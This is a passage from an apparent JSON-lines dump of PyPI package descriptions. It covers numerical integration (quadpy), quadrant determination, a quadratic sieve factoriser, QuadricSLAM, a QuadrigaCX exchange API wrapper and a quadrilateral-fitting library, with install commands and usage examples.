weight functions exp(-r),the 2D space with weight functions exp(-r),the 3D space with weight functions exp(-r),the nD space with weight functions exp(-r),the 1D space with weight functions exp(-r2),the 2D space with weight functions exp(-r2),the 3D space with weight functions exp(-r2),\nandthe nD space with weight functions exp(-r2),\nfor fast integration of real-, complex-, and vector-valued functions.For example, to numerically integrate any function over any given interval, install\nquadpyfrom the Python Package Indexwithpip install quadpyand doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x)-xval,err=quadpy.quad(f,0.0,6.0)This is likescipywith the addition that quadpy handles complex-, vector-, matrix-valued integrands,\nand \"intervals\" in spaces of arbitrary dimension.To integrate over atriangle, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x[0])*np.sin(x[1])triangle=np.array([[0.0,0.0],[1.0,0.0],[0.7,0.5]])# get a \"good\" scheme of degree 10scheme=quadpy.t2.get_good_scheme(10)val=scheme.integrate(f,triangle)Most domains haveget_good_scheme(degree). If you would like to use a particular\nscheme, you can pick one from the dictionaryquadpy.t2.schemes.All schemes havescheme.pointsscheme.weightsscheme.degreescheme.sourcescheme.test_tolerancescheme.show()scheme.integrate(# ...)and many havescheme.points_symbolicscheme.weights_symbolicquadpy is fully vectorized, so if you like to compute the integral of a function on many\ndomains at once, you can provide them all in oneintegrate()call, e.g.,# shape (3, 5, 2), i.e., (corners, num_triangles, xy_coords)triangles=np.stack([[[0.0,0.0],[1.0,0.0],[0.0,1.0]],[[1.2,0.6],[1.3,0.7],[1.4,0.8]],[[26.0,31.0],[24.0,27.0],[33.0,28]],[[0.1,0.3],[0.4,0.4],[0.7,0.1]],[[8.6,6.0],[9.4,5.6],[7.5,7.4]],],axis=-2,)The same goes for functions with vectorized output, e.g.,deff(x):return[np.sin(x[0]),np.sin(x[1])]More examples undertest/examples_test.py.Read more about the dimensionality of the input/output arraysin the\nwiki.Advanced topics:Adaptive quadratureCreating your own Gauss schemetanh-sinh quadratureSchemesLine segment (C1)Chebyshev-Gauss(type 1 and 2, arbitrary degree)Clenshaw-Curtis(arbitrary degree)Fej\u00e9r(type 1 and 2, arbitrary degree)Gauss-Jacobi(arbitrary degree)Gauss-Legendre(arbitrary degree)Gauss-Lobatto(arbitrary degree)Gauss-Kronrod(arbitrary degree)Gauss-Patterson(9 nested schemes up to degree 767)Gauss-Radau(arbitrary degree)Newton-Cotes(open and closed, arbitrary degree)See\nherefor how to generate Gauss formulas for your own weight functions.Example:importnumpyasnpimportquadpyscheme=quadpy.c1.gauss_patterson(5)scheme.show()val=scheme.integrate(lambdax:np.exp(x),[0.0,1.0])1D half-space with weight function exp(-r) (E1r)Generalized Gauss-LaguerreExample:importquadpyscheme=quadpy.e1r.gauss_laguerre(5,alpha=0)scheme.show()val=scheme.integrate(lambdax:x**2)1D space with weight function exp(-r2) (E1r2)Gauss-Hermite(arbitrary degree)Genz-Keister(1996, 8 nested schemes up to degree 67)Example:importquadpyscheme=quadpy.e1r2.gauss_hermite(5)scheme.show()val=scheme.integrate(lambdax:x**2)Circle (U2)Krylov(1959, arbitrary degree)Example:importnumpyasnpimportquadpyscheme=quadpy.u2.get_good_scheme(7)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Triangle (T2)Apart from the classical centroid, vertex, and seven-point schemes we haveHammer-Marlowe-Stroud(1956, 5 schemes up to\ndegree 5)Albrecht-Collatz(1958, degree 3)Stroud(1971, conical product scheme of degree 7)Franke(1971, 2 schemes of degree 7)Strang-Fix/Cowper(1973, 10 schemes up to degree\n7),Lyness-Jespersen(1975, 21 schemes up to degree 11,\ntwo of which are used inTRIEX),Lether(1976, degree 2n-2, arbitrary n, not symmetric),Hillion(1977, 10 schemes up to degree 3),Laursen-Gellert(1978, 17 schemes up to degree 10),CUBTRI(Laurie, 1982, degree 8),Dunavant(1985, 20 schemes up to degree 20),Cools-Haegemans(1987, degrees 8 and 11),Gatermann(1988, degree 7)Berntsen-Espelid(1990, 4 schemes of degree 13, the\nfirst one beingDCUTRI),Liu-Vinokur(1998, 13 schemes up to degree 5),Griener-Schmid, (1999, 2 schemes of degree 6),Walkington(2000, 5 schemes up to degree 5),Wandzura-Xiao(2003, 6 schemes up to degree 30),Taylor-Wingate-Bos(2005, 5 schemes up to degree\n14),Zhang-Cui-Liu(2009, 3 schemes up to degree 20),Xiao-Gimbutas(2010, 50 schemes up to degree 50),Vioreanu-Rokhlin(2014, 20 schemes up to degree 62),Williams-Shunn-Jameson(2014, 8 schemes up to\ndegree 12),Witherden-Vincent(2015, 19 schemes up to degree 20),Papanicolopulos(2016, 27 schemes up to degree 25),all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t2.get_good_scheme(12)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0],[1.0,0.0],[0.5,0.7]])Disk (S2)Radon(1948, degree 5)Peirce(1956, 3 schemes up to degree 11)Peirce(1957, arbitrary degree)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 8 schemes up to degree 15)Albrecht(1960, 8 schemes up to degree 17)Mysovskih(1964, 3 schemes up to degree 15)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Lether(1971, arbitrary degree)Piessens-Haegemans(1975, 1 scheme of degree 9)Haegemans-Piessens(1977, degree 9)Cools-Haegemans(1985, 4 schemes up to degree 13)Wissmann-Becker(1986, 3 schemes up to degree 8)Kim-Song(1997, 15 schemes up to degree 17)Cools-Kim(2000, 3 schemes up to degree 21)Luo-Meng(2007, 6 schemes up to degree 17)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s2.get_good_scheme(6)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Quadrilateral (C2)Maxwell(1890, degree 7)Burnside(1908, degree 5)Irwin(1923, 3 schemes up to degree 5)Tyler(1953, 3 schemes up to degree 7)Hammer-Stroud(1958, 3 schemes up to degree 7)Albrecht-Collatz(1958, 4 schemes up to degree 5)Miller(1960, degree 1, degree 11 for harmonic integrands)Meister(1966, degree 7)Phillips(1967, degree 7)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Franke(1971, 10 schemes up to degree 9)Piessens-Haegemans(1975, 2 schemes of degree 9)Haegemans-Piessens(1977, degree 7)Schmid(1978, 3 schemes up to degree 6)Cools-Haegemans(1985, 6 schemes up to degree 17)Dunavant(1985, 11 schemes up to degree 19)Morrow-Patterson(1985, 2 schemes up to degree 20, single precision)Cohen-Gismalla, (1986, 2 schemes up to degree 3)Wissmann-Becker(1986, 6 schemes up to degree 8)Cools-Haegemans(1988, 2 schemes up to degree 13)Waldron(1994, infinitely many schemes of degree 3)Sommariva(2012, 55 schemes up to degree 55)Witherden-Vincent(2015, 11 schemes up to degree 21)products of line segment schemesall schemes from the n-cubeExample:importnumpyasnpimportquadpyscheme=quadpy.c2.get_good_scheme(7)val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0],[1.0,0.0]],[[0.0,1.0],[1.0,1.0]]],)The points are specified in an array of shape (2, 2, ...) such thatarr[0][0]is the lower left corner,arr[1][1]the upper right. If your c2\nhas its sides aligned with the coordinate axes, you can use the convenience\nfunctionquadpy.c2.rectangle_points([x0,x1],[y0,y1])to generate the array.2D space with weight function exp(-r) (E2r)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 4 schemes up to degree 15)Stroud(1971, degree 4)Haegemans-Piessens(1977, 2 schemes up to degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r)Example:importquadpyscheme=quadpy.e2r.get_good_scheme(5)scheme.show()val=scheme.integrate(lambdax:x[0]**2)2D space with weight function exp(-r2) (E2r2)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 5 schemes up to degree 15)Stroud(1971, 3 schemes up to degree 7)Haegemans-Piessens(1977, 2 schemes of degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r2)Example:importquadpyscheme=quadpy.e2r2.get_good_scheme(3)scheme.show()val=scheme.integrate(lambdax:x[0]**2)Sphere (U3)Albrecht-Collatz(1958, 5 schemes up to degree 7)McLaren(1963, 10 schemes up to degree 14)Lebedev(1976, 34 schemes up to degree 131)Ba\u017eant-Oh(1986, 3 schemes up to degree 13)Heo-Xu(2001, 27 schemes up to degree 39)Fliege-Maier(2007, 4 schemes up to degree 4,\nsingle-precision)all schemes from the n-sphereExample:importnumpyasnpimportquadpyscheme=quadpy.u3.get_good_scheme(19)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Integration on the sphere can also be done for functions defined in spherical\ncoordinates:importnumpyasnpimportquadpydeff(theta_phi):theta,phi=theta_phireturnnp.sin(phi)**2*np.sin(theta)scheme=quadpy.u3.get_good_scheme(19)val=scheme.integrate_spherical(f)Ball (S3)Ditkin(1948, 3 schemes up to degree 7)Hammer-Stroud(1958, 6 schemes up to degree 7)Mysovskih(1964, degree 7)Stroud(1971, 2 schemes up to degree 14)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s3.get_good_scheme(4)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Tetrahedron (T3)Hammer-Marlowe-Stroud(1956, 3 schemes up to degree 3, also appearing inHammer-Stroud)Stroud(1971, degree 7)Yu(1984, 5 schemes up to degree 6)Keast(1986, 10 schemes up to degree 8)Beckers-Haegemans(1990, degrees 8 and 9)Gatermann(1992, degree 5)Liu-Vinokur(1998, 14 schemes up to degree 5)Walkington(2000, 6 schemes up to degree 7)Zhang-Cui-Liu(2009, 2 schemes up to degree 14)Xiao-Gimbutas(2010, 15 schemes up to degree 15)Shunn-Ham(2012, 6 schemes up to degree 7)Vioreanu-Rokhlin(2014, 10 schemes up to degree 13)Williams-Shunn-Jameson(2014, 1 scheme with\ndegree 9)Witherden-Vincent(2015, 9 schemes up to degree 10)Ja\u015bkowiec-Sukumar(2020, 21 schemes up to degree 20)all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t3.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,1.0]],)Hexahedron (C3)Sadowsky(1940, degree 5)Tyler(1953, 2 schemes up to degree 5)Hammer-Wymore(1957, degree 7)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 6 schemes up to degree 7)Mustard-Lyness-Blatt(1963, 6 schemes up to degree 5)Stroud(1967, degree 5)Sarma-Stroud(1969, degree 7)Witherden-Vincent(2015, 7 schemes up to degree degree 11)all schemes from the n-cubeProduct schemes derived from line segment schemesExample:importnumpyasnpimportquadpyscheme=quadpy.c3.product(quadpy.c1.newton_cotes_closed(3))# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.c3.cube_points([0.0,1.0],[-0.3,0.4],[1.0,2.1]),)Pyramid (P3)Felippa(2004, 9 schemes up to degree 5)Example:importnumpyasnpimportquadpyscheme=quadpy.p3.felippa_5()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,0.0],[0.0,0.1,1.0],],)Wedge (W3)Felippa(2004, 6 schemes up to degree 6)Kubatko-Yeager-Maggi(2013, 21 schemes up to\ndegree 9)Example:importnumpyasnpimportquadpyscheme=quadpy.w3.felippa_3()val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0]],[[0.0,0.0,1.0],[1.0,0.0,1.0],[0.5,0.7,1.0]],],)3D space with weight function exp(-r) (E3r)Stroud-Secrest(1963, 5 schemes up to degree 7)all schemes from the nD space with weight function\nexp(-r)Example:importquadpyscheme=quadpy.e3r.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)3D space with weight function exp(-r2) (E3r2)Stroud-Secrest(1963, 7 schemes up to degree 7)Stroud(1971, scheme of degree 14)all schemes from the nD space with weight function\nexp(-r2)Example:importquadpyscheme=quadpy.e3r2.get_good_scheme(6)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)n-Simplex (Tn)Lauffer(1955, 5 schemes up to degree 5)Hammer-Stroud(1956, 3 schemes up to degree 3)Stroud(1964, degree 3)Stroud(1966, 7 schemes of degree 3)Stroud(1969, degree 5)Silvester(1970, arbitrary degree),Grundmann-M\u00f6ller(1978, arbitrary degree)Walkington(2000, 5 schemes up to degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.tn.grundmann_moeller(dim,3)val=scheme.integrate(lambdax:np.exp(x[0]),np.array([[0.0,0.0,0.0,0.0],[1.0,2.0,0.0,0.0],[0.0,1.0,0.0,0.0],[0.0,3.0,1.0,0.0],[0.0,0.0,4.0,1.0],]),)n-Sphere (Un)Stroud(1967, degree 7)Stroud(1969, 3 <= n <= 16, degree 11)Stroud(1971, 6 schemes up to degree 5)Dobrodeev(1978, n >= 2, degree 5)Mysovskikh(1980, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.un.dobrodeev_1978(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Ball (Sn)Stroud(1957, degree 2)Hammer-Stroud(1958, 2 schemes up to degree 5)Stroud(1966, 4 schemes of degree 5)Stroud(1967, 4 <= n <= 7, 2 schemes of degree 5)Stroud(1967, n >= 3, 3 schemes of degree 7)Stenger(1967, 6 schemes up to degree 11)McNamee-Stenger(1967, 6 schemes up to degree 9)Dobrodeev(1970, n >= 3, degree 7)Dobrodeev(1978, 2 <= n <= 20, degree 5)Stoyanova(1997, n >= 5, degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.sn.dobrodeev_1970(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Cube (Cn)Ewing(1941, degree 3)Tyler(1953, degree 3)Stroud(1957, 2 schemes up to degree 3)Hammer-Stroud(1958, degree 5)Mustard-Lyness-Blatt(1963, degree 5)Thacher(1964, degree 2)Stroud(1966, 4 schemes of degree 5)Phillips(1967, degree 7)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1968, degree 5)Dobrodeev(1970, n >= 5, degree 7)Dobrodeev(1978, n >= 2, degree 5)Cools-Haegemans(1994, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.cn.stroud_cn_3_3(dim)val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.cn.ncube_points([0.0,1.0],[0.1,0.9],[-1.0,1.0],[-1.0,-0.5]),)nD space with weight function exp(-r) (Enr)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1971, 2 schemes up to degree 5)Example:importquadpydim=4scheme=quadpy.enr.stroud_enr_5_4(dim)val=scheme.integrate(lambdax:x[0]**2)nD space with weight function exp(-r2) (Enr2)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1967, 2 schemes of degree 5)Stroud(1967, 3 schemes of degree 7)Stenger(1971, 6 schemes up to degree 11, varying dimensionality restrictions)Stroud(1971, 5 schemes up to degree 5)Phillips(1980, degree 5)Cools-Haegemans(1994, 3 schemes up to degree 7)Lu-Darmofal(2004, degree 5)Xiu(2008, degree 2)Example:importquadpydim=4scheme=quadpy.enr2.stroud_enr2_5_2(dim)val=scheme.integrate(lambdax:x[0]**2)Installationquadpy isavailable from the Python Package Index, so withpip install quadpyyou can install.TestingTo run the tests, check out this repository and typeMPLBACKEND=Agg pytestLicenseThis software is published under theGPLv3 license."} +{"package": "quadra", "pacakge-description": "Deep Learning experiment orchestration tool"} +{"package": "quadrant", "pacakge-description": "UNKNOWN"} +{"package": "quadrantic", "pacakge-description": "Determination of quadrants based on angle, coordinates and othersOverviewThis library allows you to determine quadrant(s) based onangle (360\u00b0 or 400 Gon)location (latlon)SetupVia Pip:pipinstallquadranticVia Github (latest):pipinstallgit+https://github.com/earthobservations/quadranticImplementationsGet quadrant for angleDetermine quadrant based onDegree#####################\n# # 90\u00b0 #\n# # #\n# 180\u00b0 # 0\u00b0 #\n#####################\n# # #\n# # #\n# # 270\u00b0 #\n#####################orGon#####################\n# # 100\u00b0 #\n# # #\n# 200\u00b0 # 0\u00b0 #\n#####################\n# # #\n# # #\n# # 300\u00b0 #\n#####################fromquadranticimportQuadrantFromAngle,AngleUnit,Qquad=QuadrantFromAngle()# no args need for this method# Single quadrantquad.get(45.0,AngleUnit.DEGREE)# [Q.FIRST]# Two quadrantsquad.get(90.0,AngleUnit.DEGREE)# [Q.FIRST, Q.SECOND]# More then full circle (360\u00b0)quad.get(450.0,AngleUnit.DEGREE)# same as above + 360\u00b0# [Q.FIRST, Q.SECOND]# Negative degreequad.get(-45.0,AngleUnit.DEGREE)# [Q.FOURTH]# Degree in Gonquad.get(90.0,AngleUnit.GON)# [Q.FIRST]Get quadrant for coordinates#####################\n# (-1,1) # (1,1) #\n# # #\n# # (0,0) #\n#####################\n# # #\n# # #\n# # #\n#####################fromquadranticimportQuadrantFromCoords,AngleUnit,Qfromshapely.geometryimportPoint# Single quadrantquad=QuadrantFromCoords((0.0,0.0))quad.get((1.0,1.0))# [Q.FIRST]# Two quadrantsquad=QuadrantFromCoords((0.0,0.0))quad.get((0.0,1.0))# [Q.FIRST, Q.SECOND]# All quadrantsquad=QuadrantFromCoords((0.0,0.0))quad.get((0.0,0.0))# [Q.FIRST, Q.SECOND, Q.THIRD, Q.FOURTH]# Single quadrant with shapely Pointquad=QuadrantFromCoords(Point(0.0,0.0))quad.get(Point(1.0,1.0))# [Q.FIRST]ExamplesVisualized examples can be found in theexamplesfolder.LicenseDistributed under the MIT License. SeeLICENSE.rstfor more info.ChangelogDevelopment0.1.0 (25.09.2022)Add first version of quadrantic"} +{"package": "quadratic", "pacakge-description": "UNKNOWN"} +{"package": "quadratic-programs", "pacakge-description": "No description available on PyPI."} +{"package": "quadratic-sieve", "pacakge-description": "quadratic-sieveAn implementation of quadratic sieve algorithm for factorization.TechnologiesTechnologies used:Python version: 3.9.1numpy version: 1.20.1Development:py.test version: 6.2.2wheel version: 0.36.2Install$ pip install quadratic_sieveRun$ quadratic_sieve 12666334082118686111Running optionsusage: quadratic_sieve [-h] [-b SMOOTHNESS] [-s BASE_SIZE] [-l] n\n\npositional arguments:\n n Number to factorize.\n\noptional arguments:\n -h, --help show this help message and exit\n -b SMOOTHNESS, --smoothness SMOOTHNESS\n Set smoothness bound.\n -s BASE_SIZE, --base_size BASE_SIZE\n Set the size of generated QS base.\n -l, --loud Display messages while computing.DevelopmentTestingRunning the tests:$ pip install pytest\n$ pytestDistribution building$ pip install wheel\n$ python setup.py bdist_wheelInstalling the built distribution$ pip install dist/quadratic_sieve-0.1.1-py3-none-any.whlMore information about the quadratic sieve algorithm:Smooth numbers and the quadratic sieveA Fast Algorithm for Gaussian Elimination over GF(2) and Its Implementation on the GAPP*"} +{"package": "quadratr", "pacakge-description": "No description available on PyPI."} +{"package": "quadratum", "pacakge-description": "No description available on PyPI."} +{"package": "quadrature", "pacakge-description": "Quadrature"} +{"package": "quadricslam", "pacakge-description": "QuadricSLAMQuadricSLAM is a system for usingquadricsto represent objects in a scene, leveraging common optimisation tools for simultaneous localisation and mapping (SLAM) problems to converge on stable object maps and camera trajectories. This library usesGeorgia Tech's Smoothing and Mapping (GTSAM)library for factor graph optimisation, and adds support through our customGTSAM quadricsextension.TODO update with a more holistic reflection of the repository in its current stateThe key features of this repository are:modular abstractions that allow building QuadricSLAM solutions with custom tools:q=QuadricSLAM(data_source=MyDataSource(),detector=MyDetector(),associator=MyDataAssociator())q.spin()basic Matplotlib visualisation routinesa rich set of plug-n-play examples of the QuadricSLAM system:simple \"hello_world\" examples with dummy datarunning on theTUM RGB-D dataset, as done inour paperTODOplug-n-play on aIntel RealSense D435iwith Python TODOplug-n-play on aIntel RealSense D435iin a ROS ecosystem TODOusing data from photorealistic 3D simulation through anadd-onfor theBenchBot ecosystemTODOWe expect this repository to be active and continually improved upon. If you have any feature requests or experience any bugs, don't hesitate to let us know. Our code is free to use, and licensed under BSD-3. We simply ask that youcite our workif you use QuadricSLAM in your own research.Installation and using the libraryPre-build wheels of this library areavailable on PyPIfor most Linux systems, as well as source distributions. Install the library with:pip install quadricslamFrom here basic custom QuadricSLAM systems can be setup by implementing and integrating the following abstract classes:fromquadricslamimportDataSource,Detector,Associator,visualiseclassMyDataSource(DataSource):...classMyDetector(Detector):...classMyAssociator(Associator):...q=QuadricSlam(data_source=MyDataSource(),detector=MyDetector(),associator=MyAssociator(),on_new_estimate=lambdavals,labels,done:visualise(vals,labels,done))))q.spin()The examples described below also provide code showing how to create customisations for a range of different scenarios.Running the examples from this repositoryNote: in the spirit of keeping this package light, some dependencies may not be installed; please install those manuallyThis repository contains a number of examples to demonstrate how QuadricSLAM systems can be set up in different contexts.Each example is a file in thequadricslam_examplesmodule, with a standalonerun()function. There are two possible ways to run each example:Directly through the command line:python -m quadricslam_examples.EXAMPLE_NAME ARGS ...e.g for thehello_quadricslamexamples:python -m quadricslam_examples.hello_quadricslamOr from within Python:fromquadricslam_examples.EXAMPLE_NAMEimportrunrun()hello_manual_quadricslamShows how to create a QuadricSLAM system from scratch using the primitives exposed by ourGTSAM Quadrics library. The scenario is 4 viewpoints in a square around 2 quadrics in the middle of the square:hello_quadricslamSame scenario as thehello_manual_quadricslamexample, but uses the abstractions provided by this library. Shows how an entire QuadricSLAM system can be created with only a few lines of code when the appropriate components are available:tum_rgbd_datasetRe-creation of the TUM RGBD dataset experiments used in ourinitial publication. There is a script included for downloading the dataset.Note: the paper used hand-annotated data to avoid the data association problem; as a result the example here requires a custom data associator to be created before it will runrealsense_pythonDemonstrates how a system can be run using an RGBD RealSense, thepyrealsense2library, and a barebones OpenCV visual odometry algorithm.The example is a simple plug-n-play system, with weak localisation and data association:realsense_rosDemonstrates how a ROS QuadricSLAM system can be put together with an RGBD RealSense, theROS RealSenselibrary, andKimera VIO's visual odometry system.This example includes a script for creating an entire ROS workspace containing all the required packages built from source. Once installed, it runs the same as therealsense_pythonexample but with significantly better localisation:Citing our workIf you are using this library in academic work, please cite thepublication:L. Nicholson, M. Milford and N. S\u00fcnderhauf, \"QuadricSLAM: Dual Quadrics From Object Detections as Landmarks in Object-Oriented SLAM,\" in IEEE Robotics and Automation Letters, vol. 4, no. 1, pp. 1-8, Jan. 2019, doi: 10.1109/LRA.2018.2866205.PDF.@article{nicholson2019,title={QuadricSLAM: Dual Quadrics From Object Detections as Landmarks in Object-Oriented SLAM},author={Nicholson, Lachlan and Milford, Michael and S\u00fcnderhauf, Niko},journal={IEEE Robotics and Automation Letters},year={2019},}"} +{"package": "quadrigacx", "pacakge-description": "Python QuadrigaCX=================quadrigacx is a Python wrapper for the `QuadrigaCX API (v2)`_.Install~~~~~~~``pip install quadrigacx``or ``pip install setup.py`` in the repo\u2019s main directory after youdownload this repo.Configuration~~~~~~~~~~~~~You will need to create a config file in order to use the authenticatedAPI actions. Use sample.cfg in the config folderUsage~~~~~Basically, create a QCX object, passing in the path to the config file[like in ``quadrigacx/config/sample.cfg``], or the config options in adict [i.e.``{client_id:0000, key:yOurKeY, secret:Y0Ur53crr3T142351236}``]::import quadrigacxqcx = quadrigacx.QCX('config/auth.cfg')That QCX object then has a methods called ``methods`` which will tellyou all of the actions available in this format:::qcx.methods(){'private':[{'name':'name_of_action','requires': {'key': [value for key,value in {'maybe':'some', 'example':'data'}]},'optional': {'key': [value for key,value in {'maybe':'some', 'optional':'data'}]},'returns': {'something': {u'details': u'850.99',u'more_details': u'837.51'}},},],'public':[{'name':'name_of_action','requires': {'key': [value for key,value in {'maybe':'some', 'example':'data'}]},'optional': {'key': [value for key,value in {'maybe':'some', 'optional':'data'}]},'returns': {'something': {u'details': u'850.99',u'more_details': u'837.51'}},}]}You can take that ``name`` and pass it into QCX.api(), along with the``required`` (and ``optional``, if needed) data *as keyword arguments*,and you\u2019ll get something like the expected ``returns``.+------------+------+--------------+------------------+------------------------+-------+| **Function | **Au | **Required | **Default** | **Optional Arguments** | **Def || Name** | th** | Arguments** | | | ault* || | | | | | * |+============+======+==============+==================+========================+=======+| ticker | No | a or a list | [btc\\_cad, | | || | | of valid | btc\\_usd, | | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| order\\_boo | No | a or a list | [btc\\_cad, | A boolean to group | False || k | | of valid | btc\\_usd, | orders with the same | || | | books | eth\\_cad, | price or not | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| transactio | No | a or a list | [btc\\_cad, | A time frame; last | hour || ns | | of valid | btc\\_usd, | \u2018minute\u2019, or \u2018hour\u2019 | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| balance | Yes | | | | |+------------+------+--------------+------------------+------------------------+-------+| user\\_tran | Yes | a or a list | [btc\\_cad, | | || sactions | | of valid | btc\\_usd, | | || | | books | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| open\\_orde | Yes | open\\_orders | [btc\\_cad, | | || rs | | | btc\\_usd, | | || | | | eth\\_cad, | | || | | | eth\\_btc] | | |+------------+------+--------------+------------------+------------------------+-------+| lookup\\_or | Yes | order\\_id | | | || der | | | | | |+------------+------+--------------+------------------+------------------------+-------+| cancel\\_or | Yes | order\\_id | | | || der | | | | | |+------------+------+--------------+------------------+------------------------+-------+| buy | Yes | a valid book | | a price | |+------------+------+--------------+------------------+------------------------+-------+| | | an amount | | | |+------------+------+--------------+------------------+------------------------+-------+| sell | Yes | a valid book | | a price | |+------------+------+--------------+------------------+------------------------+-------+| | | an amount | | | |+------------+------+--------------+------------------+------------------------+-------+| bitcoin\\_d | Yes | | | | || eposit\\_ad | | | | | || dress | | | | | |+------------+------+--------------+------------------+------------------------+-------+| ether\\_dep | Yes | | | | || osit\\_addr | | | | | || ess | | | | | |+------------+------+--------------+------------------+------------------------+-------+| bitcoin\\_w | Yes | an amount | | | || ithdrawal | | | | | |+------------+------+--------------+------------------+------------------------+-------+| | | an address | | | |+------------+------+--------------+------------------+------------------------+-------+| ethereum\\_ | Yes | an amount | | | || withdrawal | | | | | |+------------+------+--------------+------------------+------------------------+-------+| | | an address | | | |+------------+------+--------------+------------------+------------------------+-------+**Notes:**- Not all items in methods() show what the return value is. I willeventually update that, but for now just play around.- I only show what the positive response should look like, negativeresponses could be (and often are) entirely different.- Honestly, you are better off just looking at QuadrigaCX\u2019s API page tosee what resuts they will provide:https://www.quadrigacx.com/api\\_infoExamples:~~~~~~~~~Basic^^^^^::print qcx.api('ticker')>> {'eth_cad': {u'volume': u'730.00552932', u'last': u'15.00', u'timestamp': u'1467639054', u'bid': u'14.90', u'vwap': u'15.47', u'high': u'16.34', u'low': u'15.00', u'ask': u'16.08'}, 'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639053', u'bid': u'878.20', u'vwap': u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}, 'eth_btc': {u'volume': u'2256.84091030', u'last': u'0.01722000', u'timestamp': u'1467639054', u'bid': u'0.01722000', u'vwap': u'0.01794464', u'high': u'0.01855999', u'low': u'0.01722000', u'ask': u'0.01819999'}, 'btc_usd': {u'volume': u'10.06581000', u'last': u'670.00', u'timestamp': u'1467639053', u'bid': u'663.10', u'vwap': u'666.91', u'high': u'700.26', u'low': u'670.00', u'ask': u'688.00'}}Optional Parameter as String^^^^^^^^^^^^^^^^^^^^^^^^^^^^::book = 'btc_cad' # Undocumented ability to send individual values not in a listprint qcx.api('ticker', book_list=book)>> {'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639054', u'bid': u'878.20', u'vwap': u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}}Optional parameter as List^^^^^^^^^^^^^^^^^^^^^^^^^^::book_list = ['btc_cad', 'eth_btc']print qcx.api('ticker', book_list=book_list)>> {'btc_cad': {u'volume': u'161.49814654', u'last': u'886.00', u'timestamp': u'1467639055', u'bid': u'878.20', u'vwap': u'867.00', u'high': u'886.00', u'low': u'856.79', u'ask': u'887.97'}, 'eth_btc': {u'volume': u'2256.84091030', u'last': u'0.01722000', u'timestamp': u'1467639055', u'bid': u'0.01722000', u'vwap': u'0.01794464', u'high': u'0.01855999', u'low': u'0.01722000', u'ask': u'0.01819999'}}Limit Purchase with unnamed parameters^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^::book = 'btc_cad'amount = 0.005print qcx.api('buy', book, amount)>> {u'error': {u'message': u'Incorrect : $7.50CAD exceeds available CAD balance', u'code': 21}}"} +{"package": "quadrilateral-fitter", "pacakge-description": "QuadrilateralFitterQuadrilateralFitteris an efficient and easy-to-use library for fitting irregular quadrilaterals from polygons or point clouds.QuadrilateralFitterhelps you find that four corners polygon thatbest approximatesyour noisy data or detection, so you can apply further processing steps like:perspective correctionorpattern matching, without worrying about noise or non-expected vertex.OptimalFitted Quadrilateralis the smallest area quadrilateral that contains all the points inside a given polygon.InstallationYou can installQuadrilateralFitterwith pip:pipinstallquadrilateral-fitterUsageThere is only one line you need to useQuadrilateralFitter:fromquadrilateral_fitterimportQuadrilateralFitter# Fit an input polygon of N sidesfitted_quadrilateral=QuadrilateralFitter(polygon=your_noisy_polygon).fit()If your application can accept fitted quadrilateral to don't strictly include all points within input polygon, you can get the tighter quadrilateral shown asInitial 